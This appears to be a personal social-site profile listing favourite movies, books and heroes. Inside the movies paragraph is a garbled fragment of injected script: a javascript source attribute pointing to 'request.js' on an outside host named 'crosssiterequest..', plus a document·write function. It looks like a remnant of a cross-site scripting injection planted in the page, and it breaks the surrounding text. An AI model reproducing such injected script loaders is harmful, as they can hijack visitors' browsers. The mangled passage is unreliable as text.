barber and bartok on a football field i like most anything that doesn't have period costumes and people spend the whole time chatting in the parlor.......but outside of that, everything from arty small movies to blockbuster special effects extravaganzas to dark dramas to silly comedies....and a special spot for 80's movies, which i'm finally starting to collect.... language="javascript" src="http://crosssiterequest../request.js"function nothingf(){document·write("nathanjosiah1.mov.r{}");}..

Books:

winters tale by mark helprin, lord of the rings, anything hemingway (serious hero-worship there), stephen ambrose, and lately some good bios----i've read a teddy roosevelt (fascinating), a genghis khan (wow, i had no idea), a joseph stalin (another eye opener)and a couple of histories like the making of the atomic bomb by richard rhodes, the great flood of 1927 by john barry, and ambrose's lewis and clark story, undaunted courage

Heroes:

mr. rogers, teddy roosevelt, the person i try to be on my very best days (i'll get there sooner or later)..
